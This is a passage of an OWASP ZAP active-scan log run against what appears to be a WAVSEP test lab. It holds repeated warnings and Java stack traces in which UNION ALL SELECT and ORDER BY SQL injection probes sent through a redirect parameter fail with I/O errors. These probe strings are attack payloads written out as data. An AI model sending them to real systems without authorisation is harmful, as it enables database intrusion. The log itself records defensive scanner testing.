org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681503 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681504 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681504 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681505 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681506 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681507 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681507 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681508 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681509 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 6554#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 6554# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681510 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681511 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681512 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681513 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL#] due to an I/O error 